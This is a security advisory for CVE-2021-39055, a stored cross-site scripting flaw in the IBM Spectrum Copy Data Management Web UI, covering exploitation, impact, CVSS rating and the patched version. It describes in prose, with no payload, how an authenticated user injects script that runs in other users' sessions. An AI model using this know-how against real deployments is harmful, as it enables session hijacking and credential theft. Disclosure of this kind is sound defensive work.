CVE-2021-39055

Vulnerability

IBM Spectrum Copy Data Management versions 2.2.0.0 through 2.2.14.3 contain a cross-site scripting (XSS) vulnerability in the Web UI. This flaw allows authenticated users with appropriate privileges to embed arbitrary JavaScript code, which is then executed in the context of other users' sessions [1]. The vulnerability is classified as a stored XSS issue, as the injected script persists in the application and triggers when other users access the affected interface.

Exploitation

An attacker must have a valid user account with permissions to access the Web UI components that accept and store unsanitized input. The attacker crafts a malicious script payload and submits it via a vulnerable input field (e.g., configuration parameters or form data). When another user, including a privileged administrator, views the affected page or interface, the injected JavaScript executes in their browser session. No additional user interaction beyond viewing the page is required for script execution [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session within the IBM Spectrum Copy Data Management Web UI. This can alter the intended functionality of the interface, potentially leading to disclosure of sensitive session credentials, such as authentication tokens or cookies. The attacker may also be able to perform actions on behalf of the victim, depending on the capabilities exposed by the injected script. The CVSS vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates low confidentiality and integrity impact with a scope change [1].

Mitigation

IBM released a fixed version to address this vulnerability. The security bulletin advises upgrading to IBM Spectrum Copy Data Management version 2.2.14.4 or later (see the IBM support page for exact version details). There is no known workaround that fully mitigates the vulnerability without applying the patch. Users should apply the update as soon as possible to prevent exploitation [1].